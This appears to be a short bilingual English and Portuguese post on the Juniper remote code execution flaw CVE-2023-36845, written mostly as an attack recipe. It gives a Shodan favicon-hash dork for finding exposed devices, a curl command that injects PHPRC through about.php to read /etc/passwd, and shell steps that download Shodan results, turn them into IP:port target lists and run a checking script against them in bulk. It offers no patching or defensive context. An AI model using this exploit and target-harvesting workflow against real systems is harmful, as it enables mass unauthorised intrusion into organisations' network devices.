
Juniper RCE (Remote Code Execution) CVE-2023-36845 is a vulnerability that has been identified within Juniper's software. This particular flaw allows for remote code execution, meaning an attacker could run arbitrary code on a system without needing physical access to the device.
Juniper RCE (Execução Remota de Código) CVE-2023-36845 é uma vulnerabilidade identificada no software da Juniper. Esta falha específica permite execução remota de código, o que significa que um invasor pode executar código arbitrário em um sistema sem precisar de acesso físico ao dispositivo.
Dork do Shodan: http.favicon.hash:2141724739
use com outros dorks relevantes, como certificados SSL, nome da organização, etc., para uma pesquisa mais direcionada.
curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"’
└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #baixar do shodan
└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt
└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt
└─# ./Juniper-RCE-check.sh -f juniper-final.txt
